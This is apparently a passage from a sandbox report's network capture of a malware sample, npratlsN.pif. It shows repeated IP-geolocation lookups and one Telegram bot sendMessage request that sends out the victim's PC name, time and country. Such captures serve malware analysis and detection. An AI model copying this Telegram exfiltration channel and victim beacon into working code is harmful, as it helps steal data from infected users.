<Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49842	104.21.80.1	443	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:44 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-16 07:25:44 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327133 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7JQoPDOW2Fv%2BeGDWahuiXJ4H%2FGHmkEopsrrBPg1Uw46soRAOh5JBGRgeoBFoNnfJoT7wC%2BKLo2h9yLHmtxopas9VbN4OSh25%2F0uILnGJlZPR7USWF22xLKcOARiUamnAXaOJSjtL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5f92fcb90f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1460&min_rtt=1457&rtt_var=553&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1966329&cwnd=231&unsent_bytes=0&cid=0df68227f57b8c6c&ts=148&x=0"
2025-01-16 07:25:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49858	104.21.80.1	443	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:47 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-16 07:25:47 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327136 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VAd%2FJ9NesfmsmmaIxIuirW0vA%2BLoaI9bXS8n3DYyFnw2vFnv6h8wanBcB2WGxTYuLmH490PMBeRWvtdH7SIFTShD1Qzyn1kFOQ2QvWDljfAzZQKm5CYZbPPVxb%2BXML5R1pKhRQzX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5fa1d9f40f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1448&min_rtt=1438&rtt_var=560&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1916010&cwnd=231&unsent_bytes=0&cid=e23819a40c02b61a&ts=157&x=0"
2025-01-16 07:25:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49865	149.154.167.220	443	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:47 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2016/01/2025%20/%2015:19:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-16 07:25:48 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 16 Jan 2025 07:25:48 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-16 07:25:48 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49872	104.21.80.1	443	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:48 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:25:49 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:48 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327138 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=33JR2GBaXB3tvMggAmDYfRbnnX2iRW14X7MjVYM471vCcaikvSJfCCkelFywLtctqI6GCzpmd6%2Bx75lf9BxccWlAXWQnW%2BhXHcxNDL3uelNM7Gez7cn1%2BQo66WcaaXBbI4fA0CGp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5fad0dcc8c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1986&rtt_var=752&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1448412&cwnd=223&unsent_bytes=0&cid=17bbe5aec48d7f7f&ts=165&x=0"
2025-01-16 07:25:49 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49878	104.21.80.1	443	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:49 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-16 07:25:49 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:49 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327138 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O9R8McrGjSCcR3Ww0c9rfibkmaNtPcTY2GbNkmn8EdA5JCZDaPhaAMCGR1cYHuSZr5Cr8fwLjzd2cjRECCDWuwIUsY%2BLoWz5YLlwp42bXQIW%2FJuda2G3J1AQxXa6cdqkyQ8jpZG%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5fb23f6a0f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1453&rtt_var=552&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1970310&cwnd=231&unsent_bytes=0&cid=244ead7806abf4c0&ts=133&x=0"
2025-01-16 07:25:49 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49889	104.21.80.1	443	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:51 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-16 07:25:51 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:51 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327140 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nBBweLV4sK%2BPwJNrQqcWUjOrOnhqbpD%2FDdV6aUtC1XRPR4KCryRkRGnbxx07TytRt0peOT54jDypvBKGpsBN0vonZSs6xoSxM79hA9CQ%2FwEzpuQFYv0Z7A5CV81Griv58gV8DWf1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5fbb3a540f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1467&rtt_var=564&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1914754&cwnd=231&unsent_bytes=0&cid=a684d27514b6e04a&ts=218&x=0"
2025-01-16 07:25:51 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49901	104.21.80.1	443	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:52 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-16 07:25:52 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:52 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327142 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NoHbAcmz4cOUJ7fbSngx9%2Bs5Dzk4RdD1EDzNYnxmcvsfI%2B3H2FPGBC5QDyBB80oqbBKoszYnHQ2%2F3NmuZswR7v1wcgNqypWS%2BkeYNxjxqV4sX1UV%2Fiwjta5MoQjGNdrFsVjaqJgL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5fc5698e7d14-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2040&min_rtt=2037&rtt_var=770&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1416100&cwnd=239&unsent_bytes=0&cid=62bd62f5a9b8db18&ts=495&x=0"
2025-01-16 07:25:52 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49908	104.21.80.1	443	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:54 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-16 07:25:54 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:54 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327143 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bdEQXOZxSi4CBzWiQPuFMZ2ZTqxxlVWneYR24%2F1Cg0lI5DZoq4CNYai%2Fq2kHw5y5B1EOhs%2BkRAhLENXOAJmGP4YVpSFR2jnDj4b4NO1ZiOsiV22L42ly8FkMnlPk69J%2BUBXODywr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5fcd9c8843ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1739&min_rtt=1739&rtt_var=653&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1673352&cwnd=228&unsent_bytes=0&cid=641d32e5898c4c04&ts=137&x=0"
2025-01-16 07:25:54 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49921	104.21.80.1	443	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:55 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-16 07:25:55 UTC	863	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:55 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327144 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fw01%2BZIwqf%2Fgs8nXkwhFH%2BzWe%2BwdbGmhzFitHfiWK4Fa2%2F3cmvF0Bmh9MdSFTn7B2LEbiCNCWoXRh7%2F6LEDaNw9wrp7HcqyrSyZLIeEaMvDyXps98lvkGWSiQsJhSapf1sGLmlMo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5fd5d92ec443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1489&rtt_var=560&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1951871&cwnd=244&unsent_bytes=0&cid=f7f5bd44dfbb0b2d&ts=149&x=0"
2025-01-16 07:25:55 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49928	104.21.80.1	443	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:56 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 07:25:56 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:56 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327145 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3EiRDiOKcu2bE1hgvOHvdLR510M29wc5t3xkvFOq7XDsIzDylj8c69WAXPSDkYL4Fjp2OrPW0aIY4KpX3F6hynp%2B4lorBeAamD7sEB1N%2FizkT%2BW8xH7wFdllZbnWCTNE353M339L"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5fdcec35c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1444&min_rtt=1433&rtt_var=559&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1919789&cwnd=244&unsent_bytes=0&cid=f8bbce1e1fe5b83e&ts=172&x=0"
2025-01-16 07:25:56 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49935	104.21.80.1	443	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:57 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-16 07:25:57 UTC	865	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:57 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2327146 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v6%2F3TuL8kcjxV0HUZ4ASG758j%2B%2BmdHUDzXlilo4E4plj3rZ%2BIBwkw%2FL6qjTObnUMb%2BbTXhlWsvSVT5EWwxKShgGJDgTOXVDmGc%2FBCj1zqKv1xSqh1DiYJndXqU21rnILhAkHAN%2Bh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902c5fe229a77d14-EWR alt-svc: h3=":443"; ma=86400 server-timing: 